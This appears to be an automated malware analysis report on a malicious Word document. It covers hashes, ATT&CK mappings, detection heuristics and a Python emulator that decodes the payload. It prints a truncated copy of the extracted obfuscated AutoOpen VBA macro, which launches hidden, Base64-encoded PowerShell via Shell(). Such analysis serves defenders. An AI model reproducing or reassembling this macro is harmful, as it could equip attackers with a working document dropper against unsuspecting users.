Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81fc8503f4a2e06b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 115.8 KB
Created: 2018-05-28 07:47:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 922e0a50d64d04119fd2c4fdfe6548c1
SHA-1: 2a1217d07b4a3384893d9dc0e896516086962fd1
SHA-256: 81fc8503f4a2e06ba55bdfb8abaabeb2649f3d3ed358bca2e87e1135df1b57d6
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample carries a VBA project whose Autoopen procedure runs when the document is opened (T1204.002, T1059.005). Autoopen calls IYJzk, which hands a concatenated string to Shell() with vbHide. That string is built as kzHuAv + Chr(vbKeyP) + BiWBKA + oXwEiCInkj: kzHuAv and BiWBKA are never assigned and, with On Error Resume Next in force, evaluate to empty strings; Chr(vbKeyP) is "P" (vbKeyP is 80); and oXwEiCInkj is the value of AfoSJ, which concatenates eleven names (the two visible ones, ScNAAEcw and kuHttpzCNww, are Functions that splice short string literals together). The result is "PowersHeLL -WinDowsTyle hidden -e <Base64>", a hidden PowerShell process started with -EncodedCommand; PowerShell matches parameter names case-insensitively, so -WinDowsTyle is -WindowStyle. The arithmetic statements interleaved between the string assignments operate on undeclared variables and are dead code that pads and varies the macro. Decoding the visible Base64 prefix as UTF-16LE gives INVoke-exPREssIon ((("{127}{117}{51}{96}..., Invoke-Expression applied to a string of numbered {n} placeholders, the pattern of format-operator (-f) reassembly, so the PowerShell stage is obfuscated a second time. The preview is truncated before the payload's tail, but taken with the ClamAV Doc.Dropper signature and the download/execution tokens reported in the p-code, the macro is consistent with a downloader whose purpose is to fetch and execute a second-stage payload.
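As an added example (not part of the analyzer's output or of the oletools project), the following Python resolves the Shell() command line the way the macro does and decodes the -e payload. The emulator, its class and function names, and SAMPLE_VBA are constructed for illustration: SAMPLE_VBA is a cut-down copy of the macro from the extracted-artifact preview, with Autoopen calling IYJzk directly instead of through AfoSJ and only the first two Base64 fragments kept; the VBA identifiers and string literals in it are the ones shown on this page. Unassigned names evaluate to empty, as VBA does under On Error Resume Next, junk arithmetic evaluates to nothing, and a trailing odd byte is dropped so a truncated preview still decodes.

```python
import base64
import re

# Constructed sample (not analyzer output): a cut-down copy of the macro on this page,
# keeping its obfuscation pattern and the exact literals of the first two Base64
# fragments; the remaining fragments are omitted, so the decoded payload is truncated.
SAMPLE_VBA = r'''
Sub Autoopen()
On Error Resume Next
ZqNUsV = (HCVpRV * KkGIL - JSvnJo * Round(75127)) + (67076 - Rnd(nqVok) + 50150 + EjcMhw)
IYJzk (ScNAAEcw + kuHttpzCNww)
End Sub
Function IYJzk(oXwEiCInkj)
On Error Resume Next
DiYizN = Shell(kzHuAv + Chr(vbKeyP) + BiWBKA + oXwEiCInkj, vbHide)
End Function
Function ScNAAEcw()
On Error Resume Next
XMFpO = "owersHeLL -Win" + "DowsT" + "yle hidden -" + "e SQBOA" + "FYAbw" + "BrAGUALQBlAHg" + "AUABSAEUAcwBzA" + "EkAbwBuACAAKA" + "AoACgA"
ObflppYrU = "IgB7ADEAMgA3AH0" + "AewAxADEANwB9A" + "HsANQAxAH" + "0AewA5ADYAfQB" + "7ADUAMA" + "B9AHsAN" + "gAyAH0AewAxA" + "DIAMwB9"
ScNAAEcw = XMFpO + ObflppYrU
End Function
'''

PROC_START = re.compile(r'^\s*(?:Function|Sub)\s+(\w+)\s*\(([^)]*)\)', re.I)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
CALL = re.compile(r'^\s*(\w+)\s*\(\s*(.*?)\s*\)\s*$')            # statement call: IYJzk (x)
SHELL = re.compile(r'Shell\s*\((.*?)(?:,\s*\w+)?\)\s*$', re.I)    # Shell(cmd, vbHide)
CHR = re.compile(r'Chr\(\s*(?:vbKey([A-Z])|(\d+))\s*\)', re.I)    # vbKeyA..vbKeyZ are 65..90
PLUS = re.compile(r'\+(?=(?:[^"]*"[^"]*")*[^"]*$)')               # '+' outside double quotes
AUTOEXEC = re.compile(r'^(auto_?open|auto_?exec|document_open|workbook_open)$', re.I)
ENCODED = re.compile(r'-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})', re.I)  # -e/-ec/-enc/-EncodedCommand


class VbaStringEmulator:
    """Evaluates only the string-building subset of VBA this macro relies on: literals,
    '+' concatenation, Chr(), local names and Function return values. Anything else
    (junk arithmetic, never-assigned names such as kzHuAv) yields '', exactly as a
    Variant Empty does under On Error Resume Next."""

    def __init__(self, src):
        self.procs, self.commands, self._active, cur = {}, [], set(), None
        for line in src.splitlines():
            if m := PROC_START.match(line):
                cur = m.group(1)
                self.procs[cur] = ([p.strip() for p in m.group(2).split(',') if p.strip()], [])
            elif cur:                            # 'End Function' is harmless as a body line
                self.procs[cur][1].append(line)

    def eval_expr(self, expr, scope):
        return ''.join(self.eval_term(t.strip(), scope) for t in PLUS.split(expr))

    def eval_term(self, term, scope):
        if len(term) >= 2 and term[0] == term[-1] == '"':
            return term[1:-1]
        if m := CHR.fullmatch(term):
            return m.group(1).upper() if m.group(1) else chr(int(m.group(2)))
        return scope[term] if term in scope else self.run(term) if term in self.procs else ''

    def run(self, name, args=()):
        """Execute a procedure; a Function returns whatever it assigned to its own name."""
        if name in self._active:                 # refuse to loop on recursive junk
            return ''
        self._active.add(name)
        params, body = self.procs[name]
        scope = dict(zip(params, args))
        for line in body:
            if m := SHELL.search(line):          # record the fully resolved command line
                self.commands.append(self.eval_expr(m.group(1), scope))
            elif m := ASSIGN.match(line):
                scope[m.group(1)] = self.eval_expr(m.group(2), scope)
            elif (m := CALL.match(line)) and m.group(1) in self.procs:
                self.run(m.group(1), (self.eval_expr(m.group(2), scope),))
        self._active.discard(name)
        return scope.get(name, '')


def decode_encoded_command(cmd):
    """Recover the script behind powershell -e: Base64 of UTF-16LE text. A trailing odd
    byte (a truncated preview, as on this page) is dropped instead of raising."""
    if not (m := ENCODED.search(cmd)):
        return None
    raw = base64.b64decode(m.group(1) + '=' * (-len(m.group(1)) % 4))
    return raw[:len(raw) - len(raw) % 2].decode('utf-16-le')


def analyse(src=SAMPLE_VBA):
    """Fire every auto-exec entry point; return [(Shell() command, decoded script or None)]."""
    emu = VbaStringEmulator(src)
    for name in list(emu.procs):
        if AUTOEXEC.match(name):
            emu.run(name)
    return [(cmd, decode_encoded_command(cmd)) for cmd in emu.commands]


if __name__ == '__main__':
    for cmd, script in analyse():
        print('Shell():', cmd[:60] + '...')
        print('decoded:', script)
```

On the sample this prints the reassembled PowersHeLL -WinDowsTyle hidden -e ... command line and the decoded prefix INVoke-exPREssIon ((("{127}{117}{51}..., which is the format-string template of the second obfuscation layer. Feeding it the complete macros.bas written out by olevba should recover the whole encoded script, since the rest of the macro uses the same constructs; the output of the -f reassembly itself would still have to be resolved in a PowerShell sandbox or by hand.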

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6561190-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6561190-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas below, containing Sub Autoopen), so here the marker is redundant with OLE_VBA_AUTOOPEN rather than evidence of a WordBasic-only document.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into embedded drawing parts; it is not a network indicator and should not be blocked or hunted.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   18826 bytes
SHA-256: 635293aea24e34f1614186c1cedd08581816194cc4c1feb803d19101bea63999

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZwNcGOTTakcIh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AfoSJ()
On Error Resume Next
VkrnG = (SbcQIj * SjbXrX - OSVmiE * Round(9835)) + (12955 - Rnd(fmGsLj) + 18494 + RKdYK)
oBhqkT = (hhUqEC * EECbL - zdCnim * Round(43224)) + (19667 - Rnd(htZDh) + 62899 + BNUmDz)
AfoSJ = ScNAAEcw + kuHttpzCNww + GWTAiwQ + wjhivzCS + QmbTSfGKNzd + hZzOqXMzCiX + HRJhTZ + orsLFDlbbCl + tUilhRiju + amQCqGYkzj + LkZzvAtLfSz
lBHdu = (NHCMi * LztLwz - czbRAV * Round(66524)) + (36782 - Rnd(oGZZz) + 46057 + lXIcw)
End Function
Sub Autoopen()
On Error Resume Next
ZqNUsV = (HCVpRV * KkGIL - JSvnJo * Round(75127)) + (67076 - Rnd(nqVok) + 50150 + EjcMhw)
IYJzk (AfoSJ)
ljHiSG = (RAQCi * uZKDi - zOiUc * Round(69530)) + (61020 - Rnd(jafwMN) + 62180 + DCKUc)
End Sub
Function IYJzk(oXwEiCInkj)
On Error Resume Next
WqEmC = (piVYi * wXGPfu - jVqURq * Round(39631)) + (51628 - Rnd(VItNZt) + 84630 + PqhMkB)
GUhQI = (oWQiw * fVnwis - JMfQE * Round(7512)) + (61045 - Rnd(zoMZv) + 38913 + NzIESh)
DiYizN = Shell(kzHuAv + Chr(vbKeyP) + BiWBKA + oXwEiCInkj, vbHide)
mdfdIM = (cuzUj * tbDcMc - phDIBQ * Round(88658)) + (15105 - Rnd(niZXca) + 3594 + bvTzXu)
End Function


Attribute VB_Name = "EPcsmtfrp"
Function ScNAAEcw()
On Error Resume Next
BEukq = (LlEINa * zDzkW - spIslw * Round(67615)) + (5570 - Rnd(QYUXLq) + 50441 + YGOvKv)
XMFpO = "owersHeLL -Win" + "DowsT" + "yle hidden -" + "e SQBOA" + "FYAbw" + "BrAGUALQBlAHg" + "AUABSAEUAcwBzA" + "EkAbwBuACAAKA" + "AoACgA"
inZID = (hLNTX * sLJmH - WUjnpP * Round(18247)) + (49401 - Rnd(aiIli) + 88346 + OzYbz)
ObflppYrU = "IgB7ADEAMgA3AH0" + "AewAxADEANwB9A" + "HsANQAxAH" + "0AewA5ADYAfQB" + "7ADUAMA" + "B9AHsAN" + "gAyAH0AewAxA" + "DIAMwB9"
jMGDnf = (fPUGAn * ZqwKwd - GhFioQ * Round(80834)) + (94390 - Rnd(Njwkl) + 37825 + lbdsjL)
dWkqRINtk = "AHsAOAAwAH0A" + "ewAyADcAf" + "QB7ADIA" + "OAB9AHsAMQA1A" + "DAAfQB7A" + "DEAMgA2AH0AewA"
BluSc = (zOcWu * iBVzPr - EGaDDp * Round(12131)) + (16840 - Rnd(iVlLv) + 45898 + wtzNY)
sqNlJj = "xADIA" + "fQB7ADYA" + "MQB9AHsAOAA" + "3AH0AewA5ADkAf" + "QB7ADgAfQB7ADEA" + "MwA1AH0Ae" + "wAxADE"
wDZpJ = (jQcOAz * Dbhqd - PnjHk * Round(67201)) + (63649 - Rnd(wZFRi) + 19204 + HWdOfR)
jOrzcLKfldC = "AOQB9AHsAMQA" + "yADkAfQB7" + "ADEAMgAxAH0AewA" + "xADAAfQB7ADkAN" + "wB9AHsAOQAzA" + "H0AewAxADUAMQB"
wGGlNo = (bOCTr * YSwpG - ihrWzW * Round(75764)) + (28449 - Rnd(EDcwEm) + 82868 + AzUsm)
BcOXFYIz = "9AHsAM" + "QAzADQA" + "fQB7ADEAMQA2A" + "H0AewAxADEAMwB" + "9AHsAOA" + "A4AH0AewA0" + "ADgAfQB7AD" + "EAMAAxA" + "H0AewAxADUANA" + "B9AHsAMQAxADgA"
KCzmA = (oaoHD * vFjJOa - YXLaV * Round(73693)) + (43833 - Rnd(tvpljv) + 20730 + TzjmvG)
swcnhlB = "fQB7A" + "DEAMwA" + "3AH0Aew" + "AyADYAfQB7ADgA" + "NQB9AHsANQA0" + "AH0AewAxADAAMgB" + "9AHsAN" + "gA4AH0AewA4AD" + "EAfQB7ADcAMAB"
ScNAAEcw = XMFpO + ObflppYrU + dWkqRINtk + sqNlJj + jOrzcLKfldC + BcOXFYIz + swcnhlB
End Function
Function kuHttpzCNww()
On Error Resume Next
PVuVrm = (rkuSNz * cbAdlv - wVTnkY * Round(30497)) + (19178 - Rnd(niStwE) + 51671 + fvDDF)
MJvLOWm = "9AHsANwA3A" + "H0AewA5" + "ADQAfQB7ADM" + "ANQB9AHsANQA3AH" + "0AewA2ADUA"
RiLhrX = (JKKzQA * hHNahF - ovFCY * Round(1702)) + (68869 - Rnd(psbtdC) + 10688 + qYmwi)
fjMisEs = "fQB7ADEAMAA3AH0" + "AewA1AH0AewAxAD" + "QAMQB9AHs" + "AMQAzADgAfQB7AD" + "kANQB9AH" + "sAMQA1ADg" + "AfQB7ADYA" + "MAB9AHsANAA1AH"
HvfDz = (YidWzk * mFfTXw - VSWWW * Round(47163)) + (54222 - Rnd(XBvIcV) + 77325 + XUBAa)
ftiUiIVvAr = "0AewA1ADYA" + "fQB7ADEA" + "NAA0AH0Aew" + "A3ADQAfQB7ADQAO"
PFtsa = (TLEPw * woZJh - GqKbbr * Round(16546)) + (14191 - Rnd(vHzVwk) + 26612 + QcdwJ)
hPdmanZw = "QB9AHsAMQAyADQA" + "fQB7ADQANg" + "B9AHs" + "AMQAyADg" + "AfQB7ADcAMgB9A" + "HsANgAzAH0A" + "ewAxADUA"
MwjKI = (zkOmZ * kwndCk - UYDFt * Round(99772)) + (67947 - Rnd(lIjDcz) + 54463 + ivhAkz)
NFkTUuEz = "NgB9AHsAM" + "wAyAH0AewA" + "xADUANwB9AHsA" + 
... (truncated)